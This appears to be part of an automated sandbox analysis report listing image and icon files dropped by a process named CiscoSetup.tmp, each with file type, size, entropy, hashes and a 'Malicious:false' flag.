                                                                                                                                      SHA-256:288C513CA8875B4BC5DB6144D0C4215680F5BF3385DF05D6A8EC2896587DB6D3
                                                                                                                                      SHA-512:BAC0482951830571BDAF8A1FF0C23B3EB1C6AFB72C46628150EAEE2CD99167FEBE9A74DCAA2F2DAEDA5B58856BA7A9378880A7EB0B5D834D31EA91D3010B41F8
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4267
                                                                                                                                      Entropy (8bit):7.94257084168463
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:IqGbLvTlphRGJSqAeFg590km/kqzrxsoCeaV6XjNfUmhPRD3el9:ILhKFZa0PCPiNfU2RCL
                                                                                                                                      MD5:7014A8C17D7E8E5A2BEDB4C4E0C12E80
                                                                                                                                      SHA1:28881EE38814E155FA7B1E0096801A644CAB6548
                                                                                                                                      SHA-256:BD9514FA182DE90450B6E6E3EEDB2E084CD1390D5B6FDF0509B81EC36B963147
                                                                                                                                      SHA-512:B2B94E806A4F1F8BACAA2870944C75952A9C9F0577AF6571BFF65038DCD242AF5B887E400430E8E8B0B8E8BD2BA7A7318247581304C668662A7A6A255F142A12
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):3.612237043911612
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:SPEyydQzC5enoYfFMdIDhjdmrEEN4kbGg2o:SFS5eno4FMyADNHx
                                                                                                                                      MD5:CAE552335F760EE1FF87D686F972BEB8
                                                                                                                                      SHA1:676A5070DDD6218C274FE01608754D06E735558A
                                                                                                                                      SHA-256:615057C1B8C472DDF3D6B48284DB764F3F4FE8A159FD479B96C401D0BEE82674
                                                                                                                                      SHA-512:876B7077A8DF9C900BCF1CF8D5AF98A3B84A7D31412DEE05CAF76ACA215B771EFD5CD5E8225175E822BCE24239A57F841D1DDF633B3C68599D0C401AA98BBDF9
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2465
                                                                                                                                      Entropy (8bit):7.9078675566370515
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:OSjMqJt67atsaB2Q95MFMQQYs/7uI2/D8:OSd+7OsTQTuQYszIb8
                                                                                                                                      MD5:161092451DAE50221183377F7CFB560E
                                                                                                                                      SHA1:2884EE1CAD503614512FAF274C3E0AC209F9201B
                                                                                                                                      SHA-256:8CB267EF7B475567CF0A347A4E99CC533102789A966B7285A7733FD8E4FBDE47
                                                                                                                                      SHA-512:0BD327894C7A1AFC5AF1B3CD1D678370C568DF1A06A32408B4A4A3047A846657EDC09A1A0E094565EF4004DF6FEE3FBF0A2885FE0279F4920CB91FBE1D897B14
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 22, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):291
                                                                                                                                      Entropy (8bit):6.344520469543007
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:6v/lhPqJsXTSgECFg9ZA3teRaCCgqMtK+ywsl3DF1bp:6v/7hXeBOgIYawtvyx3/1
                                                                                                                                      MD5:DA395D5499E3403BC29899F8ED09E0F4
                                                                                                                                      SHA1:A6806BF5F7B2B0E1DDB705E2DBDF761E704738CD
                                                                                                                                      SHA-256:E72F87D5171DCD847C6A5994471B97339C4595E0C55591B1641227B56DB02041
                                                                                                                                      SHA-512:FEF71C2D806F506CD67B3338484C0B100989135012E72B321287C662AD65BD9120B210270D0B023F76FCAFD23237E9EDEDD5987E6B4D3731B9776B2EB338FE18
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 67 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1264
                                                                                                                                      Entropy (8bit):7.787798189239225
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GblEbksH883ZKHGbOgt1NxI7aY1nigCC2OjKe6Yt3CvPTWngq2i3sTj85:ElEJH8I/NkQgQ+KtY1C3Sngq2VW
                                                                                                                                      MD5:DB2D5090354734EC085D88810B342866
                                                                                                                                      SHA1:F727BC14361A4332C73BFB5194CA5FF6EAC37959
                                                                                                                                      SHA-256:996C1A034CC8B6CA3C511E2C7EE2FED22F31904DB769A1AD8555F1CFD478AA62
                                                                                                                                      SHA-512:04F9B9B5EABD33E318F6A83A734ECA67C2778745560F44F45C535847BF642B33DB2C6C974CC7A6AAE4C68C67470135B15ABB2A77247BFF3C518EC113FDFD8888
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 3226 x 2226, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):76349
                                                                                                                                      Entropy (8bit):6.476357962983417
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:FVQKRdUmqPkx3KW18PXAvBXZc1cgOdRAXYg3w9pxiwzL6s7UJrwu4be/NG0Zpnel:FVT3K1PQx32w9pUwCKu4k5Tne54DD+
                                                                                                                                      MD5:FC85657D1B695A1BBF554859C7073AB6
                                                                                                                                      SHA1:DE271697015CD2BE237C3F112A2FA8391C7FE0A0
                                                                                                                                      SHA-256:734ACBF5F095BFC5092CCDE8C2721477C6B6F8C4BEC6E14F7F6E11012DC648F9
                                                                                                                                      SHA-512:AD8DA7E48ED1288FC24B7CE87B7F5557D1055C141B385E8BDC37B0BF56FF1BFFDF3516759DA613BD066EEB64C25C43D0D1609C3EC5AF7900081BA9083BF4361F
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8594
                                                                                                                                      Entropy (8bit):7.973082494080156
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:IhgOYUbtU91yZQm0IZ5GE1njVNMooVREvukNGEsuiaoYOyF40:IhaUpU91ScIZ5PjVNaREvpjiao4+0
                                                                                                                                      MD5:D1F876BC1C789A4108570185251B864E
                                                                                                                                      SHA1:9F91D3B837191A9499CD2959EC1802CF444D78AE
                                                                                                                                      SHA-256:DF137D0086B1A5DC1A0508643AB8DBE66A0A268A2A5E7A539EDF39F6957AF1AB
                                                                                                                                      SHA-512:4E1D5AE2D6539B38EDEFEC017B41DD50D7EA41AEF9B6783538D8D19D9C14E2D9411D2DF86AC672BD6B171A507F77EF2D4976003206DC4624687BA4588BAA6688
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12258
                                                                                                                                      Entropy (8bit):7.976396258951981
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:Fkocto5a0L5W0WyUW8l4JGfcRWyryRN77YK/CPEyei5rTiKb9bdgih7OnT:Fkocto5zW0dNaAfRxKK80dbd5hanT
                                                                                                                                      MD5:33B3721B931071C69A9ECDFDAEF39F29
                                                                                                                                      SHA1:EE4DD7077CFDA9C0A2FE594CE8C9496EF23CA2E3
                                                                                                                                      SHA-256:55FC14B826D7F3C9F47F14CDBDAE488F1D4FE3678CD95BBBF7E643436F382D37
                                                                                                                                      SHA-512:B8E1843F2F08ADF93F7277FFAF8DD5299F7F5FCFA38AD15EC54422D4E3048822E15BB9D0B682D1728B6E4064CAE32222998ED48D41310FE7D9C58116D6D9E108
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):10239
                                                                                                                                      Entropy (8bit):7.950564187811269
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:uTeKIu+Nxu1/eEefaoIgGSw78i5GJssnezz3Gu5cMrvF6AO:uTeg+NkdeCodGSiV3dcI96AO
                                                                                                                                      MD5:7DADB01AC22B7AB6F313726AD5977675
                                                                                                                                      SHA1:274554CDEB3971D3A9250AA0A7597F8B41D17000
                                                                                                                                      SHA-256:EBBA9313774314E18ABB4F4342B1C0C93DF22DD45146C6E84A08EB39BD419825
                                                                                                                                      SHA-512:C77FA7F8791A4852DBA2C9402D705E6C4CDB92DAAF71CD5F46EA8AD6EA35E41D4CFF42296C2F08133A82AE1F31DCA05C61B29AC291F85BBE4C7FDF088A4F0866
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2274
                                                                                                                                      Entropy (8bit):7.88487369762579
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ANENb8K8isarhoHup4l7Hn5MPuvW5LApZJ+WoXY:Bbx3rGHupubC6NpzSXY
                                                                                                                                      MD5:02AA7BFBC5519A9410E0D27732A6A163
                                                                                                                                      SHA1:9DDE546C6090CA4BD8BE58F8625A6AE25D440E6E
                                                                                                                                      SHA-256:B08A8AE17D62E9CF9D6E91E59955AF91E1B126FD82BC1071BDAFEE8AB6818253
                                                                                                                                      SHA-512:323777E1ABC44F643AD6AE581970D551D6BB94DF485377E91DB411ED8B839C47F8490002DF9756AD340BC19D8676050A620A1008F211B3AC32C39BE37CD35093
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 22, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):291
                                                                                                                                      Entropy (8bit):6.344520469543007
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:6v/lhPqJsXTSgECFg9ZA3teRaCCgqMtK+ywsl3DF1bp:6v/7hXeBOgIYawtvyx3/1
                                                                                                                                      MD5:DA395D5499E3403BC29899F8ED09E0F4
                                                                                                                                      SHA1:A6806BF5F7B2B0E1DDB705E2DBDF761E704738CD
                                                                                                                                      SHA-256:E72F87D5171DCD847C6A5994471B97339C4595E0C55591B1641227B56DB02041
                                                                                                                                      SHA-512:FEF71C2D806F506CD67B3338484C0B100989135012E72B321287C662AD65BD9120B210270D0B023F76FCAFD23237E9EDEDD5987E6B4D3731B9776B2EB338FE18
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1601
                                                                                                                                      Entropy (8bit):6.020486157649533
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:HA/6I1hxWwUyl3ZknA9VYVhEfNAG+ojoyMmcI1VYj41jCw1jaPl3VYjJoUHH3yG3:g/6G6GknA9Wg2O0y/c0CKum23CuUHiWV
                                                                                                                                      MD5:F999F81B91475C98DE33D66E186DF2CA
                                                                                                                                      SHA1:397B889C5AA95A25FFBD128656BE5D91A71F3275
                                                                                                                                      SHA-256:F807E26DA3A4BBFBD9552D2D50FB0F5FC28AAC46635470E3F834C2042C05310B
                                                                                                                                      SHA-512:2A43CB4EFC414F8FAE4EA173FB53CF2819975C76170DCEE4A995B3A74786C167C26DF258E1E589ECD92DECB999683EA38C6C4882CC2E299313C9357080521844
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1601
                                                                                                                                      Entropy (8bit):6.01754566314674
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:g/6G6GknA9Wg2A/c0glTl3clp3glfHiucV:gSuknmWg2A/qlTlslelfHiucV
                                                                                                                                      MD5:1F1425233D56C7381E8A1B9544656A3F
                                                                                                                                      SHA1:13DA3D280A4561F9018BFDF2C55396862B42C3BE
                                                                                                                                      SHA-256:FD348FEFE62E962AD34D03B3639E850AAEDCEAD2585311F8F665EFFF9319A6BA
                                                                                                                                      SHA-512:ACEC3FD68209F5AF45FC0736ECD9DB2441E69BD0A0DC43C45CEF2529BDC14B4D4A41696C0BED6E11876F066E137D29E270866FE86F3A20FC4CB9F09BA0EFE0AC
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1577
                                                                                                                                      Entropy (8bit):5.942243839150427
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:HA/6I1hxWwUyl3ZknA9VYVhEfNA6h+REMmcI1VCnw7Pl3Vv7aHH3yGNbBg:g/6G6GknA9Wg26x/c0eG3tmHiGg
                                                                                                                                      MD5:8675E6CF868FCE7270D170D83CE58757
                                                                                                                                      SHA1:B08567ACEF2380521759E4A1C12B1C9FE657ABED
                                                                                                                                      SHA-256:593A68E8FC7ADF787E5728D044AC71D4A9BEC6E4A6BF15895ABC8C4869F33625
                                                                                                                                      SHA-512:6480B3304656ECA345326A96FEF93B653B9F40550E5B0D14498B2670BAFB497E78A2517911F8E791E1DEC3C9A3070CB4212DB727FBE3FC648F6100E5EF349B2F
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12068
                                                                                                                                      Entropy (8bit):7.961027992023309
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:ukEiqZZQXKSmwL4v9UIqsQ8Dfn0Mv2RYkTONqT0oHrkbthyZpLpXrCAfrdag8csp:uViqZZQXKSmwL4VXJhsYOTynyZpNmAjE
                                                                                                                                      MD5:7E7FE0627B08E07FEE4ED11C41A9BA59
                                                                                                                                      SHA1:E3C6036975AD146D70AE76158EEBD3D8109B0C7F
                                                                                                                                      SHA-256:019183BF0C9A25E37A7EB74ABB3DC7848C1A729BBDA1F557E26A5322DBAF11E2
                                                                                                                                      SHA-512:30E68B932388A840F92D45AA97C3B9CC012C28F36DE93D315B107C7223DCBFBF94A54A09492E930642555828FCB3F6CA519F75BE6EA451DFF7B1D2F5B8FA2472
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2531
                                                                                                                                      Entropy (8bit):7.8827223365027725
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:PajMqdGnKe/dujhrZicEFhViZIs2sJ69y+10zTECChhrHxgpj:PaIqcnKeKZHg7by+ezTLUhrR+j
                                                                                                                                      MD5:2EA165B23D882176DAAD7C368EE24642
                                                                                                                                      SHA1:A46B746D76A41D4B322552BE4D66E9FAC66D7C19
                                                                                                                                      SHA-256:5B0F218A1EDB9CE79C15E8278557CCDB8AF44EAD52B4149CBC27DEF6FFE38619
                                                                                                                                      SHA-512:7C6C1F9FBDB726AF81551CB2CB790B847904E10AB90923A8FA43C34D617FD4A7F4B0A6FC85D327FA140D8C42197213F2A2BBB4643C16A1FC7DF17C1AF1E674FC
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):3.4732129504366194
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:h6QRIHYm77Z5IVpIHwuS0g72HR1K9TEYkbGg2o:iHY0TUuUSHRAQXHx
                                                                                                                                      MD5:E61CF737A35E8DB52178528A0CBFE702
                                                                                                                                      SHA1:DE0A794D67A3DEF7079CEC7C48AC580CC71A7270
                                                                                                                                      SHA-256:559C518DC1F316C4991DC95D131CAB0BDAC445B1CE41B28EC8244CDD78F8AB2F
                                                                                                                                      SHA-512:8563013E9A2B75F5EDF00D71A292634FE375D5F6670F7F303C2CAB2DC271FDFC04A760417E2D487269D26611F6D236E6164EFC3179452AB34B1D42ABC17C51B6
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):4.010961844615086
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:+9/hYGSEklnePwwDIr4LcARtTmOj/FrzFkT7goo:+9/CGShEPJcX87v
                                                                                                                                      MD5:393317DEF43F554C69A8ED63065E5BBE
                                                                                                                                      SHA1:09185B8B3C21C5CFB6661958665B6D997BF64E6F
                                                                                                                                      SHA-256:92ACFDA492B05FAA52BD32E9581F028BEE55F1C5AF617ACD8EE9E6985C9D1CBD
                                                                                                                                      SHA-512:9C7B0D37DA9080F27F0116F0C45AA5CD2D9480955433D60CCEE1555C0D930081655705C65565C7C18B766458530FA5B8DD641E7D2F8776BBB8650B7D3A95351C
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3683
                                                                                                                                      Entropy (8bit):7.90204028759812
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTuU1G4X0vy:TSDS0tKg9E05TuGG4k6
                                                                                                                                      MD5:4D8816B117672123F84ECD051877A37D
                                                                                                                                      SHA1:C9983DE5E4DD52660A109C418DBDA7B7F202E2E8
                                                                                                                                      SHA-256:3D2A9058537240F9131F6A8D083A6723A0D45E31BF2BBA4EA761DE23948C8209
                                                                                                                                      SHA-512:63395803D1BED8B33E1854D6EC5EEF2322FFE69B5150CF414692D7AE8003ABA601FB283C8CB661ED4AD633B4ACF945AADC579A84910441963F8EE801D0CEB447
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4455
                                                                                                                                      Entropy (8bit):7.908038022091361
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTIaLT1ZWqwPFR34mH:TSDS0tKg9E05TBZWqqPH
                                                                                                                                      MD5:2E3C536FBC9DDA9D0DA7DD408FA3D69B
                                                                                                                                      SHA1:4056553645ACFD51D5BB1E74623ED9938C0F5717
                                                                                                                                      SHA-256:D86F0CEDDF46C275DF0FC6CF0FE70852DD270D0BC35355CC6B30CE7DDD6EC2B7
                                                                                                                                      SHA-512:AB3237097BBA665CC1B22F4A4C280C6141E8266EA9D4A569C3B53D4401E00F4E1E0F7944A172C16CDD455AF8EAF3EAA9FC43A08EFDFE7844689BFC7B4CB870F1
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):26674
                                                                                                                                      Entropy (8bit):7.935979285003627
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:YFyemvD4Gm3D6kkgmo+C24RkZErZWiTVCbFk:YryD4G+Dcgmo+C9kZsZWpFk
                                                                                                                                      MD5:B1655EC01B232A1A42E43F950321285A
                                                                                                                                      SHA1:F34C1F228C66BF4ED1B0E9901D3284EBD7A01600
                                                                                                                                      SHA-256:9E2447F1B7B4A3404C8D3588DAB59CF51635049BE4F1FC0D1BDEE77DEFFC5B47
                                                                                                                                      SHA-512:BCC1BC2AE795109EF83422613D9B0D9FF23EA81136479748FFA7CD7FC03D527B4744833728637F7892B5F60DD476F1F32122AECCCC26DB2D6092CD2346A750BA
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):28939
                                                                                                                                      Entropy (8bit):7.960017526195935
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:OkJC2FKvbdu0G3091/3+WVlQkJyE3MNLc37Wr65:FCQmc0390W0kT8ll8
                                                                                                                                      MD5:B52EAA7318111371B2B8EF3425AD4405
                                                                                                                                      SHA1:DB16F9570B55F8045FE8354ACC853655791557AA
                                                                                                                                      SHA-256:C33C036B94E3BD83D393E552CE87784BA9F74D2B8563162024DAF7ED05E7EF6D
                                                                                                                                      SHA-512:AA98F3130A76BCD5FAF093886472F1A937E93AD0A8E83C00F9675C14C7AFC5DF903C52DE64FBAD6012F5DF54A1DB56759481BA8516C0DB0A851B6BE87FD13DFF
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):29327
                                                                                                                                      Entropy (8bit):7.967732566337996
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:kfiUT6EuEADj9MKT8NYMSNQ0Ksn1GStodN2AG1:kfTGGYRKK1GStodNw
                                                                                                                                      MD5:A0FE71E2020412BD9FFEB2712628DAD0
                                                                                                                                      SHA1:33EBF21B46A1742A46DEEE2EADB0F714B4F64959
                                                                                                                                      SHA-256:3AF5729F9A5902B409FD0D79BA1B04AF2ABDB25BCB4750F235BD61DC2EEE7C77
                                                                                                                                      SHA-512:D4886F29044F3B6A1FB900AF1973362B6822085544ED65877B2F555B360E494912AAFFDA58E49C8A91ED541F9D18482A1811C9350074797416CC8ECD06CC1863
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):31702
                                                                                                                                      Entropy (8bit):7.968827949628217
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:j9rxAm3IyJR5xmDQXMUg0HvpXOQFvgMN/2iHxr:j5X5AVUjEQ9NVRr
                                                                                                                                      MD5:D7A6605937F7BE6861ED243FEED7B2AF
                                                                                                                                      SHA1:CE9EFBCE4C470923C242615A0B53E775800BB031
                                                                                                                                      SHA-256:331F0FB3EAA0F38927DD0B350A6D92B8E18ACFDF64CBC597B470EF6E4D055C81
                                                                                                                                      SHA-512:A9C1C5503D9987245389C762ECDA0F4803BD84CC3D47534731F9194BB33DF93C7FEA6569D6E0BE03C4A59551B4F8021AA129A38FFF653FEB81B5DBF065438FCF
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):26026
                                                                                                                                      Entropy (8bit):7.927985837095832
                                                                                                                                      Encrypted:false
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5803
                                                                                                                                      Entropy (8bit):7.950077949239442
                                                                                                                                      Encrypted:false
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):29723
                                                                                                                                      Entropy (8bit):7.971507308971378
                                                                                                                                      Encrypted:false
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 67 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1264
                                                                                                                                      Entropy (8bit):7.787798189239225
                                                                                                                                      Encrypted:false
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):14308
                                                                                                                                      Entropy (8bit):7.981829207860698
                                                                                                                                      Encrypted:false
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):13810
                                                                                                                                      Entropy (8bit):7.9753795366170355
                                                                                                                                      Encrypted:false
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):10811
                                                                                                                                      Entropy (8bit):7.9725003667897125
                                                                                                                                      Encrypted:false
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):13727
                                                                                                                                      Entropy (8bit):7.982847912604664
                                                                                                                                      Encrypted:false
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):13633
                                                                                                                                      Entropy (8bit):7.975971786407776
                                                                                                                                      Encrypted:false
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):10710
                                                                                                                                      Entropy (8bit):7.9641316394298025
                                                                                                                                      Encrypted:false
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12252
                                                                                                                                      Entropy (8bit):7.977665916091742
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:wld0FFxadXOHqBRtSDkAW0C6j7dNirKFbu+MMIxh0kOeg+Y/meTYeJlJlFrQ/:2oFxTqvt4TW56j7uraNw70kkHd/Jnk
                                                                                                                                      MD5:864800C5743CB649C4616758EA169E4F
                                                                                                                                      SHA1:3A02818977AF60D5DA37011CFC35DF11FC467906
